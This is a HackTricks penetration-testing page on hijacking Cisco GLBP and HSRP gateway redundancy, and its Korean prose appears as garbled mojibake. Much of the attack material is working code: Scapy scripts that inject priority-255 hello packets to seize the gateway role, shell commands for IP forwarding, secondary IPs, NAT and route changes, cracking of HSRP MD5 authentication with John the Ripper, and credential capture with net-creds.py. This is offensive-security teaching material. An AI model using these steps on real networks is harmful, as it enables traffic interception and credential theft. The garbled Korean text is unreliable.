GLBP & HSRP ๊ณต๊ฒฉ
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
FHRP ํ์ด์ฌํน ๊ฐ์
FHRP์ ๋ํ ์ค๋ช
FHRP๋ ์ฌ๋ฌ ๋ผ์ฐํฐ๋ฅผ ๋จ์ผ ๊ฐ์ ์ฅ์น๋ก ํตํฉํด ๋คํธ์ํฌ์ ๊ฐ์ธ์ฑ, ๋ก๋ ๋ถ์ฐ ๋ฐ ์ฅ์ ํ์ฉ์ฑ์ ์ ๊ณตํ๋๋ก ์ค๊ณ๋์์ต๋๋ค. Cisco Systems๋ ์ด ๊ณ์ด์ GLBP์ HSRP ๊ฐ์ ์ฃผ์ ํ๋กํ ์ฝ์ ๋์ ํ์ต๋๋ค.
GLBP ํ๋กํ ์ฝ ์ค๋ช
Cisco๊ฐ ๋ง๋ GLBP๋ TCP/IP ์คํ์์ ๋์ํ๋ฉฐ ํต์ ์ UDP ํฌํธ 3222๋ฅผ ์ฌ์ฉํฉ๋๋ค. GLBP ๊ทธ๋ฃน์ ๋ผ์ฐํฐ๋ค์ 3์ด ๊ฐ๊ฒฉ์ผ๋ก โhelloโ ํจํท์ ๊ตํํฉ๋๋ค. ๋ผ์ฐํฐ๊ฐ 10์ด ๋์ ์ด ํจํท์ ๋ณด๋ด์ง ์์ผ๋ฉด ์คํ๋ผ์ธ์ผ๋ก ๊ฐ์ฃผ๋ฉ๋๋ค. ๋ค๋ง ์ด ํ์ด๋จธ๋ค์ ๊ณ ์ ๋์ด ์์ง ์์ผ๋ฉฐ ์์ ํ ์ ์์ต๋๋ค.
GLBP์ IPv6 ๋์์ UDP/3222๋ฅผ ํตํ ๋ฉํฐ์บ์คํธ FF02::66์ ์ฌ์ฉํ๊ณ , ๊ฐ์ MAC ํ์์ 0007.b4xx.xxyy๊ฐ ๋ฉ๋๋ค (AVF ID๋ ๋ง์ง๋ง ๋ฐ์ดํธ์ ์์น). ํ์ด๋ฐ๊ณผ ๊ณต๊ฒฉ ํ๋ฉด์ IPv4์ ๋์ผํ๋ฏ๋ก ๋์ผ์คํ ๋คํธ์ํฌ์์๋ ํ์ด์ฌํน ๊ธฐ๋ฒ์ด ์๋ํฉ๋๋ค.
GLBP ๋์๊ณผ ๋ก๋ ๋ถ์ฐ
GLBP๋ ๋จ์ผ ๊ฐ์ IP์ ๋ค์์ ๊ฐ์ MAC ์ฃผ์๋ฅผ ์ฌ์ฉํด ๋ผ์ฐํฐ ๊ฐ์ ๋ก๋ ๋ถ์ฐ์ ๊ฐ๋ฅํ๊ฒ ํฉ๋๋ค. GLBP ๊ทธ๋ฃน์์๋ ๋ชจ๋ ๋ผ์ฐํฐ๊ฐ ํจํท ํฌ์๋ฉ์ ๊ด์ฌํฉ๋๋ค. HSRP/VRRP์ ๋ฌ๋ฆฌ GLBP๋ ์ฌ๋ฌ ๋ฉ์ปค๋์ฆ์ ํตํด ์ค์ ๋ก ๋ก๋ ๋ฐธ๋ฐ์ฑ์ ์ ๊ณตํฉ๋๋ค:
- Host-Dependent Load Balancing: ํธ์คํธ์ ๋ํด ์ผ๊ด๋ AVF MAC ์ฃผ์ ํ ๋น์ ์ ์งํ์ฌ ์์ ์ ์ธ NAT ๊ตฌ์ฑ์ ์ค์ํฉ๋๋ค.
- Round-Robin Load Balancing: ๊ธฐ๋ณธ ๋์์ผ๋ก, ์์ฒญํ๋ ํธ์คํธ๋ค ์ฌ์ด์์ AVF MAC ์ฃผ์๋ฅผ ๋ฒ๊ฐ์ ํ ๋นํฉ๋๋ค.
- Weighted Round-Robin Load Balancing: ๋ฏธ๋ฆฌ ์ ์๋ โWeightโ ๋ฉํธ๋ฆญ์ ๋ฐ๋ผ ๋ก๋๋ฅผ ๋ถ๋ฐฐํฉ๋๋ค.
GLBP์ ์ฃผ์ ๊ตฌ์ฑ ์์ ๋ฐ ์ฉ์ด
- AVG (Active Virtual Gateway): MAC ์ฃผ์๋ฅผ ํผ์ด ๋ผ์ฐํฐ๋ค์๊ฒ ํ ๋นํ๋ ์ฃผ ๋ผ์ฐํฐ์ ๋๋ค.
- AVF (Active Virtual Forwarder): ๋คํธ์ํฌ ํธ๋ํฝ์ ์ฒ๋ฆฌํ๋๋ก ์ง์ ๋ ๋ผ์ฐํฐ์ ๋๋ค.
- GLBP Priority: AVG๋ฅผ ๊ฒฐ์ ํ๋ ๋ฉํธ๋ฆญ์ผ๋ก ๊ธฐ๋ณธ๊ฐ์ 100์ด๊ณ 1์์ 255 ์ฌ์ด์ ๋๋ค.
- GLBP Weight: ๋ผ์ฐํฐ์ ํ์ฌ ๋ถํ๋ฅผ ๋ฐ์ํ๋ฉฐ ์๋์ผ๋ก ๋๋ Object Tracking์ ํตํด ์กฐ์ ํ ์ ์์ต๋๋ค.
- GLBP Virtual IP Address: ๋คํธ์ํฌ์ ์ฐ๊ฒฐ๋ ๋ชจ๋ ์ฅ์น์ ๊ธฐ๋ณธ ๊ฒ์ดํธ์จ์ด๋ก ๋์ํฉ๋๋ค.
์ํธ์์ฉ์ ์ํด GLBP๋ ์์ฝ๋ ๋ฉํฐ์บ์คํธ ์ฃผ์ 224.0.0.102์ UDP ํฌํธ 3222๋ฅผ ์ฌ์ฉํฉ๋๋ค. ๋ผ์ฐํฐ๋ 3์ด ๊ฐ๊ฒฉ์ผ๋ก โhelloโ ํจํท์ ์ ์กํ๋ฉฐ, 10์ด ๋์ ํจํท์ ๋์น๋ฉด ๋น์๋์ผ๋ก ๊ฐ์ฃผ๋ฉ๋๋ค.
GLBP ๊ณต๊ฒฉ ๋ฉ์ปค๋์ฆ
๊ณต๊ฒฉ์๋ ์ฐ์ ์์ ๊ฐ์ด ๊ฐ์ฅ ๋์ GLBP ํจํท(255)์ ์ ์กํ์ฌ ์ฃผ ๋ผ์ฐํฐ๊ฐ ๋ ์ ์์ต๋๋ค. ์ด๋ DoS ๋๋ MITM ๊ณต๊ฒฉ์ผ๋ก ์ด์ด์ ธ ํธ๋ํฝ์ ๊ฐ๋ก์ฑ๊ฑฐ๋ ๋ฆฌ๋๋ ์ ํ ์ ์์ต๋๋ค.
Practical GLBP hijack with Scapy (short PoC)
from scapy.all import *
vip = "10.10.100.254" # learned from sniffing
pkt = IP(dst="224.0.0.102")/UDP(dport=3222,sport=3222)/Raw(
b"\x01\x00\xff\x64" # Version=1, Opcode=Hello, Priority=255, Weight=100
)
send(pkt, iface="eth0", loop=1, inter=1)
payload bytes๋ฅผ ์ ์ํ์ฌ GLBP header (version/opcode/priority/weight/VRID)๋ฅผ ๋ชจ๋ฐฉํ์ธ์. ํ๋ ์์ ๋ฐ๋ณต ์ ์กํ๋ฉด authentication์ด ์์ ๊ฒฝ์ฐ AVG election์์ ์น๋ฆฌํ๊ฒ ๋ฉ๋๋ค.
Loki๋ก GLBP Attack ์คํ
Loki๋ priority์ weight๊ฐ 255๋ก ์ค์ ๋ ํจํท์ ์ฃผ์ ํ์ฌ GLBP attack์ ์ํํ ์ ์์ต๋๋ค. ๊ณต๊ฒฉ ์ ๋จ๊ณ๋ก๋ virtual IP address, authentication ์กด์ฌ ์ฌ๋ถ, router priority values ๋ฑ๊ณผ ๊ฐ์ ์ ๋ณด๋ฅผ Wireshark ๊ฐ์ ๋๊ตฌ๋ก ์์งํ๋ ๊ฒ์ด ํฌํจ๋ฉ๋๋ค.
Attack Steps:
- promiscuous mode๋ก ์ ํํ๊ณ IP forwarding์ ํ์ฑํํฉ๋๋ค.
- ๋์ ๋ผ์ฐํฐ๋ฅผ ์๋ณํ๊ณ ํด๋น IP๋ฅผ ํ์ธํฉ๋๋ค.
- Gratuitous ARP๋ฅผ ์์ฑํฉ๋๋ค.
- AVG๋ฅผ ์ฌ์นญํ๋ ์ ์ฑ GLBP ํจํท์ ์ฃผ์ ํฉ๋๋ค.
- ๊ณต๊ฒฉ์์ ๋คํธ์ํฌ ์ธํฐํ์ด์ค์ GLBP virtual IP๋ฅผ ๋ณต์ ํ secondary IP ์ฃผ์๋ฅผ ํ ๋นํฉ๋๋ค.
- ์์ ํ ํธ๋ํฝ ๊ฐ์์ฑ์ ์ํด SNAT์ ๊ตฌํํฉ๋๋ค.
- ์๋ AVG ๋ผ์ฐํฐ๋ฅผ ํตํด ์ธํฐ๋ท ์ ๊ทผ์ ๊ณ์ ์ ์งํ๋๋ก ๋ผ์ฐํ ์ ์กฐ์ ํฉ๋๋ค.
์ด ๋จ๊ณ๋ค์ ๋ฐ๋ฅด๋ฉด ๊ณต๊ฒฉ์๋ โman in the middleโ ์์น๋ฅผ ํ๋ณดํ์ฌ ์ํธํ๋์ง ์์๊ฑฐ๋ ๋ฏผ๊ฐํ ๋ฐ์ดํฐ๋ฅผ ํฌํจํ ๋คํธ์ํฌ ํธ๋ํฝ์ ๊ฐ๋ก์ฑ๊ณ ๋ถ์ํ ์ ์์ต๋๋ค.
๋ฐ๋ชจ๋ฅผ ์ํด, ํ์ํ ๋ช ๋ น ์ค๋ํซ์ ๋ค์๊ณผ ๊ฐ์ต๋๋ค:
# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1
# Configure secondary IP and SNAT
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
# Adjust routing
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
Monitoring and intercepting traffic can be done using net-creds.py or similar tools to capture and analyze data flowing through the compromised network.
์๋ ์ค๋ช : HSRP Hijacking (๋ช ๋ น ์ธ๋ถ์ฌํญ ํฌํจ)
Overview of HSRP (Hot Standby Router/Redundancy Protocol)
HSRP๋ ๋คํธ์ํฌ ๊ฒ์ดํธ์จ์ด์ ์ค๋ณต์ฑ์ ์ํด Cisco๊ฐ ๋ง๋ ๋ ์ ํ๋กํ ์ฝ์ ๋๋ค. ์ฌ๋ฌ ๊ฐ์ ๋ฌผ๋ฆฌ์ ๋ผ์ฐํฐ๋ฅผ ๋จ์ผ ๋ ผ๋ฆฌ ์ ๋์ผ๋ก ๊ตฌ์ฑํ์ฌ ๊ณต์ IP ์ฃผ์๋ฅผ ์ฌ์ฉํ๊ฒ ํฉ๋๋ค. ์ด ๋ ผ๋ฆฌ ์ ๋์ ํธ๋ํฝ์ ๋ผ์ฐํ ํ๋ ์ฑ ์์ด ์๋ ์ฃผ ๋ผ์ฐํฐ์ ์ํด ๊ด๋ฆฌ๋ฉ๋๋ค. GLBP์ ๋ฌ๋ฆฌ(์ฐ์ ์์๋ weight ๊ฐ์ ๋ฉํธ๋ฆญ์ ์ฌ์ฉํ ๋ก๋๋ฐธ๋ฐ์ฑ), HSRP๋ ํธ๋ํฝ ๊ด๋ฆฌ๋ฅผ ์ํด ๋จ์ผ active ๋ผ์ฐํฐ์ ์์กดํฉ๋๋ค.
HSRPv1์ multicast 224.0.0.2์ virtual MAC 0000.0c07.acXX๋ฅผ ์ฌ์ฉํฉ๋๋ค; HSRPv2 and HSRPv2 for IPv6๋ 224.0.0.102 / FF02::66์ virtual MAC 0000.0c9f.fXXX๋ฅผ ์ฌ์ฉํฉ๋๋ค. UDP destination port๋ IPv4์ ๊ฒฝ์ฐ 1985, IPv6์ ๊ฒฝ์ฐ 2029์
๋๋ค.
Roles and Terminology in HSRP
- HSRP Active Router: ๊ฒ์ดํธ์จ์ด ์ญํ ์ ํ๋ฉฐ ํธ๋ํฝ ํ๋ฆ์ ๊ด๋ฆฌํ๋ ์ฅ๋น์ ๋๋ค.
- HSRP Standby Router: Active ๋ผ์ฐํฐ์ ๋ฌธ์ ๊ฐ ์๊ฒผ์ ๋ ์ฆ์ ์ญํ ์ ์ธ๊ณ๋ฐ์ ์ค๋น๊ฐ ๋ ๋ฐฑ์ ๋ผ์ฐํฐ์ ๋๋ค.
- HSRP Group: ๋จ์ผ ํ๋ ฅ์ ๊ฐ์ ๋ผ์ฐํฐ๋ฅผ ํ์ฑํ๊ธฐ ์ํด ํ๋ ฅํ๋ ๋ผ์ฐํฐ๋ค์ ์งํฉ์ ๋๋ค.
- HSRP MAC Address: HSRP ์ค์ ์์ ๋ ผ๋ฆฌ ๋ผ์ฐํฐ์ ํ ๋น๋ ๊ฐ์ MAC ์ฃผ์์ ๋๋ค.
- HSRP Virtual IP Address: ์ฐ๊ฒฐ๋ ์ฅ์น๋ค์ ๊ธฐ๋ณธ ๊ฒ์ดํธ์จ์ด ์ญํ ์ ํ๋ HSRP ๊ทธ๋ฃน์ ๊ฐ์ IP ์ฃผ์์ ๋๋ค.
HSRP Versions
HSRP๋ HSRPv1๊ณผ HSRPv2์ ๋ ๊ฐ์ง ๋ฒ์ ์ด ์์ผ๋ฉฐ, ์ฃผ๋ก ๊ทธ๋ฃน ์์ฉ๋ ฅ, ๋ฉํฐ์บ์คํธ IP ์ฌ์ฉ, ๊ฐ์ MAC ์ฃผ์ ๊ตฌ์กฐ์์ ์ฐจ์ด๊ฐ ๋ฉ๋๋ค. ์ด ํ๋กํ ์ฝ์ ์๋น์ค ์ ๋ณด ๊ตํ์ ์ํด ํน์ ๋ฉํฐ์บ์คํธ IP ์ฃผ์๋ฅผ ์ฌ์ฉํ๋ฉฐ, Hello ํจํท์ ๋งค 3์ด๋ง๋ค ์ ์ก๋ฉ๋๋ค. 10์ด ๊ฐ๊ฒฉ ๋ด์ ํจํท์ ์์ ํ์ง ๋ชปํ๋ฉด ํด๋น ๋ผ์ฐํฐ๋ ๋นํ์ฑ์ผ๋ก ๊ฐ์ฃผ๋ฉ๋๋ค.
HSRP Attack Mechanism
HSRP ๊ณต๊ฒฉ์ ์ต๋ ์ฐ์ ์์ ๊ฐ์ ์ฃผ์ ํ์ฌ Active Router์ ์ญํ ์ ๊ฐ์ ๋ก ํ์ทจํ๋ ๊ฒ์ ํฌํจํฉ๋๋ค. ์ด๋ Man-In-The-Middle (MITM) ๊ณต๊ฒฉ์ผ๋ก ์ด์ด์ง ์ ์์ต๋๋ค. ์ฌ์ ๊ณต๊ฒฉ ๋จ๊ณ๋ก๋ HSRP ์ค์ ์ ๋ํ ๋ฐ์ดํฐ๋ฅผ ์์งํ๋ ๊ฒ์ด ํ์ํ๋ฉฐ, ์ด๋ ํธ๋ํฝ ๋ถ์์ ์ํด Wireshark๋ฅผ ์ฌ์ฉํด ์ํํ ์ ์์ต๋๋ค.
Quick HSRP takeover with Scapy
from scapy.all import *
vip = "10.10.100.1"
pkt = IP(dst="224.0.0.102")/UDP(sport=1985,dport=1985)/Raw(
b"\x00\x02\xff\x03\x00\x00\x00\x01" # Hello, priority 255, group 1
)
send(pkt, iface="eth0", inter=1, loop=1)
If authentication is not configured, continuously sending hellos with higher priority forces peers into Speak/Listen states and lets you become Active, redirecting traffic through your host.
HSRP authentication corner cases
- Legacy plain-text auth๋ ์ฝ๊ฒ ์คํธํ ๊ฐ๋ฅํ๋ค.
- MD5 authentication์ HSRP ํ์ด๋ก๋๋ง ๋ณดํธํ๋ฏ๋ก, ์กฐ์๋ ํจํท์ผ๋ก ์ ์ด ํ๋ ์ธ์ rate-limit/DoSํ ์ ์๋ค. ์ผ๋ถ NX-OS ๋ฆด๋ฆฌ์ค๋ ์ธ์ฆ๋ ๊ทธ๋ฃน์ ๋ํด DoS๋ฅผ ํ์ฉํ ์ ์ด ์๋ค(์ฐธ์กฐ: Cisco advisory CSCup11309).
- ๋ง์ ISP / VPS ๊ณต์ VLAN์์ HSRPv1 multicasts๊ฐ ํ ๋ํธ์ ๋ ธ์ถ๋๋ฏ๋ก, ์ธ์ฆ์ด ์์ผ๋ฉด ์ฐธ๊ฐํด ํธ๋ํฝ์ ์ ์ (preempt)ํ ์ ์๋ค.
Steps for Bypassing HSRP Authentication
- HSRP ๋ฐ์ดํฐ๋ฅผ ํฌํจํ ๋คํธ์ํฌ ํธ๋ํฝ์ .pcap ํ์ผ๋ก ์ ์ฅํ๋ค.
tcpdump -w hsrp_traffic.pcap
- hsrp2john.py๋ฅผ ์ฌ์ฉํด .pcap์์ MD5 ํด์๋ฅผ ์ถ์ถํ๋ค.
python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
- John the Ripper๋ก MD5 ํด์๋ฅผ ํฌ๋ํ๋ค.
john --wordlist=mywordlist.txt hsrp_hashes
Executing HSRP Injection with Loki
- Loki๋ฅผ ์คํํด HSRP advertisements๋ฅผ ์๋ณํ๋ค.
- ๋คํธ์ํฌ ์ธํฐํ์ด์ค๋ฅผ promiscuous ๋ชจ๋๋ก ์ค์ ํ๊ณ IP forwarding์ ํ์ฑํํ๋ค.
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1
- Loki๋ก ํน์ ๋ผ์ฐํฐ๋ฅผ ํ๊ฒํ ํ๊ณ , ํฌ๋ํ HSRP ํจ์ค์๋๋ฅผ ์ ๋ ฅํ ๋ค Active Router๋ฅผ ์ฌ์นญํ๊ธฐ ์ํ ์ค์ ์ ์ํํ๋ค.
- Active Router ์ญํ ์ ํ๋ํ ํ, ๋คํธ์ํฌ ์ธํฐํ์ด์ค์ IP tables๋ฅผ ๊ตฌ์ฑํด ์ ๊ท ํธ๋ํฝ์ ๊ฐ๋ก์ฑ๋ค.
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
- ๋ผ์ฐํ ํ ์ด๋ธ์ ์์ ํด ํธ๋ํฝ์ด ์ด์ Active Router๋ฅผ ๊ฒฝ์ ํ๋๋ก ์ค์ ํ๋ค.
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
- ๊ฐ๋ก์ฑ ํธ๋ํฝ์์ ์๊ฒฉ์ฆ๋ช (credentials)์ ์บก์ฒํ๋ ค๋ฉด net-creds.py๋ ์ ์ฌ ๋๊ตฌ๋ฅผ ์ฌ์ฉํ๋ค.
sudo python2 net-creds.py -i eth0
์ด ์ ์ฐจ๋ฅผ ์ํํ๋ฉด ๊ณต๊ฒฉ์๋ ํธ๋ํฝ์ ๊ฐ๋ก์ฑ๊ณ ์กฐ์ํ ์ ์๋ ์์น๋ฅผ ํ๋ณดํ๊ฒ ๋๋ฉฐ, ์ด๋ GLBP hijacking ์ ์ฐจ์ ์ ์ฌํ๋ค. ์ด๋ HSRP์ ๊ฐ์ redundancy ํ๋กํ ์ฝ์ ์ทจ์ฝ์ฑ์ ๋ณด์ฌ์ฃผ๋ฉฐ ๊ฐ๋ ฅํ ๋ณด์ ์กฐ์น์ ํ์์ฑ์ ๊ฐ์กฐํ๋ค.
References
- https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9
- Cisco NX-OS HSRP authentication DoS (CSCup11309)
- Reddit: HSRP seen on VPS shared VLANs
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


